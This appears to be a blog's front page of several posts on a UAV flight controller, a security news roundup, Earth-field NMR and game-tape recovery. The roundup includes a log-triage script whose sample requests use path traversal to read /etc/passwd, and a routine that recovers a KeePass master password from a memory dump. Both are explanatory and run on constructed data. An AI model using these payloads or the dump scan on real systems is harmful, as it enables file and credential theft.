UAV Flight Controller Saves Weight

When building autonomous airborne vehicles like drones or UAVs, saving a little bit of weight goes a long way, literally. Every gram saved means less energy needed to keep the aircraft aloft and ultimately more time in the air, but unmanned vehicles often need to compromise some on weight in order to carry increased computing abilities. Thankfully this one carries a dizzying quantity of computer power for an absolute minimum of weight, and has some clever design considerations to improve its performance as well.

The advantage of this board compared to other similar offerings is that it is built to host a Raspberry Pi Compute Module 4, while the flight control hardware is kept separate on the same board. The Pi never runs the flight control code, which frees up its computing power and lets it run a UAV-specific OS like OpenHD or RubyFPV. These bring a number of valuable tools for unmanned flight, such as setting up long-range telemetry and camera links. The system supports dual HD camera input as well as other USB devices, and also includes an electronic speed controller mezzanine with support for quadcopters and fixed-wing craft.

Separating non-critical tasks like cameras and telemetry from the more important flight controls has a number of benefits as well, including improved reliability and simpler software and program design. And with a weight of only 30 grams, it won’t take too much cargo space on most UAVs. While the flight computer is fairly capable of controlling various autonomous aircraft, whether it’s a multi-rotor like a quadcopter or a fixed wing device, you might need a little more computing power if you want to build something more complicated.

This Week In Security: GitLab, KeePassMini, And Horse

There’s a really nasty CVSS 10.0 severity vulnerability in GitLab 16.0.0. The good news is that this is the only vulnerable version, and the fix, 16.0.1, came a mere two days after the vulnerable release. If you happened to be very quick to go to 16.0.0, then be very quick to get the fix, because CVE-2023-2825 looks like a bad one.

An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.

That’s a very specific set of requirements for the vulnerability, so it seems like hardly any installs would be vulnerable. The rest of the story is that regular users can create groups, and many installs allow open user registration, so an attacker can build the required nesting themselves. If you’re running GitLab 16.0.0, update now!
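A practitioner who ran 16.0.0 for those two days would want to know whether anyone tried. The following is an added example, not GitLab’s code and not a reproduction of the actual exploit: it triages constructed, Apache-combined-style access log lines for percent-encoded directory traversal under an `/uploads/` path, decoding repeatedly to catch double encoding, and notes how deeply the project is nested in groups so hits matching the advisory’s “at least five groups” precondition stand out. The log lines, IPs, group names and upload hash are all made up.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache "combined" style); not real traffic.
# Line 1: encoded traversal under a project nested five groups deep.
# Line 2: a legitimate attachment download.
# Line 3: the same idea, double-encoded (%25 -> %, so %252e -> %2e -> .).
SAMPLE_LOG = """\
10.0.0.5 - - [24/May/2023:10:01:02 +0000] "GET /group-a/group-b/group-c/group-d/group-e/project/uploads/0123abcd/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1234
10.0.0.6 - - [24/May/2023:10:01:05 +0000] "GET /group-a/project/uploads/0123abcd/diagram.png HTTP/1.1" 200 55231
10.0.0.7 - - [24/May/2023:10:01:09 +0000] "GET /group-a/group-b/group-c/group-d/group-e/project/uploads/0123abcd/%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
"""

# ip, method, path, status from a combined-format line (assumed log shape).
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing, so %252e%252e%252f
    becomes '../' instead of slipping past a single-pass check."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze_path(raw_path):
    """Return None for non-uploads paths; otherwise the decoded path, the
    number of group segments before the project, and a traversal flag."""
    decoded = fully_decode(raw_path.split("?", 1)[0])
    segments = [s for s in decoded.split("/") if s]
    if "uploads" not in segments:
        return None
    idx = segments.index("uploads")
    # Segments before 'uploads' are <groups...>/<project>; subtract the project.
    group_depth = max(idx - 1, 0)
    traversal = any(seg == ".." for seg in segments[idx + 1:])
    return {"decoded": decoded, "group_depth": group_depth, "traversal": traversal}


def triage(log_text):
    """Flag every uploads request whose decoded path climbs with '..'."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        info = analyze_path(path)
        if info and info["traversal"]:
            hits.append({
                "ip": ip,
                "status": int(status),
                "path": path,
                "decoded": info["decoded"],
                "group_depth": info["group_depth"],
                # Advisory precondition: project nested in at least five groups.
                "cve_2023_2825_shape": info["group_depth"] >= 5,
            })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["group_depth"], hit["decoded"])
```

Note the 404 on the double-encoded line: a failed attempt is still worth knowing about, which is why the triage keys on the request shape rather than the response code.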

KeePassMini

A Redditor got a surprising notice that someone attempted to access a bank account, but failed two-factor authentication. That seemed odd, and led the Redditor down the rabbit hole of auditing the apps on their phone. One iOS app in particular stood out as possibly problematic: KeePassMini.

The app was an iOS client for KeePass, the password manager. The problem was some analytics. It looks like KeePassMini was bundling up some system information and uploading it to a server controlled by the developer. Analytics are often unpopular, but this app was including the system clipboard contents in the uploaded data. Yikes! And it gets worse: the app fills passwords by way of that same clipboard, so some of the protected passwords may have been scooped up into that analytics data. And sent unencrypted. Oof.

Now, the app author has pulled the plug on the app altogether, and responded on the old GitHub project page. It’s a bit odd, but it’s perfectly believable that there were no ill intentions here. Regardless, code that ships the clipboard off-device is a big problem in a password manager client, and it undoes a lot of trust in a project.

And KeePass itself has a problem, though a much less worrying one. KeePass tries to keep sensitive data out of its own memory in cleartext whenever possible, the idea being to offer some protection even on a compromised machine. [vdohney] on SourceForge discovered a channel to recover most of the master password, by being just a bit clever. When a user types in the master password, by default KeePass shows the last letter typed and replaces the previous letters with bullets. Each iteration of that string ends up in program memory, so an attacker with a memory dump can search for the bullet characters and find a set of leftover strings like •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. Sort them by bullet count and the password falls out, minus the first character, which never gets a bullet prefix. Now remember, this requires an attacker to already have a dump of the process, a pagefile, or a hibernation file from your system, so it’s not a gaping weakness in KeePass.

As you can see from the POC on GitHub, the problem is that the .NET text box used for the master password creates a new managed string for every keystroke and never scrubs the old ones, so it likely affects both Windows users and Linux users running under Mono. The mitigation the KeePass team is taking is to poison the well: insert enough random dummy fragments that picking the correct character for each position becomes a lot harder. It’s still getting fixed in the next release.
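To make the leak and the mitigation concrete, here is an added example that is not the published POC and not KeePass code. It builds a constructed byte buffer standing in for a process dump, with the UTF-16LE leftover strings (bullets U+25CF followed by one revealed character) scattered among filler bytes, then recovers the password by grouping fragments on bullet count. A second buffer adds decoy fragments in the style of the “poison the well” fix, and the same recovery routine is left unable to decide those positions. The password, the filler and the decoys are all made up.

```python
import random
import re

BULLET = "\u25cf"  # what the masked text box shows for already-typed characters


def make_dump(password, decoys=(), seed=7):
    """Constructed stand-in for a memory dump: one UTF-16LE string per keystroke
    after the first ("•a", "••s", ...), plus optional decoy fragments of the
    same shape, shuffled and padded with filler that contains no bullet bytes."""
    rng = random.Random(seed)
    fragments = [(BULLET * i + password[i]).encode("utf-16-le")
                 for i in range(1, len(password))]
    fragments += [(BULLET * pos + ch).encode("utf-16-le") for pos, ch in decoys]
    rng.shuffle(fragments)
    filler_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ\x00\x00\x00\x00"

    def filler():
        return bytes(rng.choice(filler_alphabet) for _ in range(rng.randint(8, 40)))

    dump = filler()
    for frag in fragments:
        dump += frag + filler()
    return dump


# One or more UTF-16LE bullets (bytes CF 25) followed by one printable ASCII
# character in UTF-16LE (byte, then 0x00).
_LEFTOVER = re.compile(rb"((?:\xcf\x25)+)([\x20-\x7e])\x00")


def candidates(dump):
    """Map character position -> set of characters seen after that many bullets."""
    found = {}
    for m in _LEFTOVER.finditer(dump):
        position = len(m.group(1)) // 2  # bullet count == index of revealed char
        found.setdefault(position, set()).add(m.group(2).decode("ascii"))
    return found


def reconstruct(dump):
    """Rebuild the password; '?' marks position 0 (never leaked) and any
    position with conflicting candidates (what the decoy mitigation causes)."""
    found = candidates(dump)
    if not found:
        return ""
    out = []
    for position in range(max(found) + 1):
        chars = found.get(position, set())
        out.append(next(iter(chars)) if len(chars) == 1 else "?")
    return "".join(out)


if __name__ == "__main__":
    print(reconstruct(make_dump("password")))
    print(reconstruct(make_dump("password", decoys=[(3, "x"), (5, "q")])))
```

Two decoys are enough to blind this naive scan, but a cleverer attacker could still rank candidates by frequency or run the ambiguous positions through a wordlist, which is why the dummy fragments only raise the cost rather than remove the leak.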

Horse Shell for MIPS Routers

Check Point Research brings us news of Horse Shell, a piece of malware written specifically for MIPS routers running Linux. It’s been found in TP-Link firmware images so far, but since so many of those routers are built on the same Linux SDK, the implant appears applicable to many models. The firmware images examined were found in a collection of tools used by Camaro Dragon, a rather catchy name for a Chinese APT group.

The implant has the capabilities you would expect, like data collection, a remote shell, and remote proxy support. It has some really sneaky tricks, too, like storing part of its data on the partition reserved for WiFi calibration data. One has to wonder whether hijacking that partition hurts the router’s wireless performance. In the firmware images examined, the quickest tell is to go to the firmware upgrade page: if it’s blank, with no form to upload new firmware, you may be running the malicious image.

WordPress

WordPress 6.2.1 has a security fix, improved upon in 6.2.2, for block themes parsing shortcodes found in user-generated content. A shortcode is a tag inside [square brackets] that WordPress replaces with more complicated generated output. We use a code shortcode all the time here on Hackaday, to try to get source code to render nicely, angle brackets and all.

It turns out the fix in 6.2.1 went a little overboard, breaking quite a few sites by disabling shortcodes in block theme templates altogether. The situation in 6.2.2 is a bit better, with most of the problems dealt with. Sometimes it’s hard to tell the bugs and the features apart.

And a WordPress plugin, Beautiful Cookie Consent Banner, is under active attack for a Cross-Site Scripting vulnerability. The attack is odd, as WordPress.org shows just 40,000 active installs, yet almost 1.5 million sites have been sent the malicious payload in an attempt to exploit the plugin. And the kicker? The payload in this campaign appears to be a dud that fails to actually infect a vulnerable site. It can still break things on a vulnerable site, so make sure to check your plugins.

Bits and Bytes

Speaking of plugins, be careful which VS Code extensions you use. They’re not all friendly. Microsoft has been working to keep malicious extensions off the official marketplace, but that arms race never seems to end, and a couple of known-malicious extensions had racked up nearly 50,000 installs between them.

For some in-depth fun, check out this PDF paper on attacks against Android fingerprint readers. It seems simple, right? Take an image of the finger, compare it to the enrolled data, and lock the phone if the check fails too many times. It is, of course, not quite that simple. Researchers formulated two loopholes, Cancel-After-Match-Fail and Match-After-Lock, both of which abuse user-friendly features to get far more fingerprint attempts than the lockout should allow. Read the paper for the juicy details.

And finally, Troy Hunt had some fun at the expense of a scammer. Troy’s wife was selling a fridge on Gumtree, and they decided to play along with a suspicious “buyer”. Turns out, it’s the old agent fee scam: I’ll give you the money you asked for, plus $800 to cover the fee. Can you forward that extra money on? But of course, the PayPal confirmation message was faked, and no money was ever paid. Troy managed to extract an impressive amount of information, including that the scam is actually being run out of, you guessed it, Nigeria. Shipping would be a pain.

Getting Into NMR Without The Superconducting Magnet

Exploring the mysteries of quantum mechanics surely seems like an endeavor that requires room-sized equipment and racks of electronics, along with large buckets of grant money, to accomplish. And while that’s generally true, there’s quite a lot that can be accomplished on a considerably more modest budget, as this as-simple-as-it-gets nuclear magnetic resonance spectrometer amply demonstrates.

First things first: Does the “magnetic resonance” part of “NMR” bear any relationship to magnetic resonance imaging? Indeed it does, as the technique of lining up nuclei in a magnetic field, perturbing them with an electromagnetic field, and receiving the resultant RF signals as the nuclei snap back to their original spin state lies at the heart of both. And while MRI scanners and the large NMR spectrometers used in analytical chemistry labs both use extremely powerful magnetic fields, [Andy Nicol] shows us that even the Earth’s magnetic field can be used for NMR.

[Andy]’s NMR setup couldn’t be simpler. It consists of a coil of enameled copper wire wound on a 40 mm PVC tube and a simple control box with nothing more than a switch and a couple of capacitors. The only fancy bit is a USB audio interface, which is used to amplify and digitize the roughly 2 kHz signal generated by hydrogen nuclei as they precess in Earth’s extremely weak magnetic field. A tripod stripped of all ferrous metal parts is also handy, as this setup needs to be outdoors where interfering magnetic fields can be minimized. In use, current from a LiPo battery is run through the coil for about 10 seconds to polarize the sample, then the coil is rapidly switched over to the input of the USB audio interface. The resulting resonance signal is visualized on the waterfall display in SDR#.

[Andy] includes a lot of helpful tips in his excellent write-up, like tuning the coil with capacitors, minimizing noise, and estimating the exact resonance frequency expected based on the strength of the local magnetic field. It’s a great project and a good explanation of how NMR works. And it’s nowhere near as loud as an MRI scanner.

When The Professionals Trash Your Data Tape, Can It Still Be Recovered?

People trying to preserve digital artifacts held on old media often not only have to contend with the media themselves decaying, but also with obscure media formats for which there’s seemingly little chance of finding a working reader. [Kneesnap] had this problem with a tape containing the only known copy of all the assets for the game Frogger 2: Swampy’s Revenge, and the tale of how the data was recovered is a dive into both the shady side of the data recovery industry and some clever old-format hacking.

The tape was an OnStream cartridge, a short-lived format from a company whose first product hit the market at the end of the ’90s and who went bust in 2004. An old drive was found, but it proved to have a pinch roller melted with age, so in desperation the tape was sent to a data recovery company.

We admire the forbearance in not naming and shaming the data recovery company, because far from recovering the data they sent the tape back damaged and spliced, something you can get away with on an analogue tape but not on a digital one without compromising the data. Faced with an unreadable tape and a slightly different OnStream cartridge, how could anything be salvaged?

The answer came in overriding the drive’s sensors and initializing it with a known-good tape, then swapping out the tapes so that the drive, unaware anything had changed, could read whatever data it could find. In the event the vast majority of the archive was retrieved, making it a win for the preservation of that game.

This may be more involved than some recovery stories, but it’s not the first we’ve covered.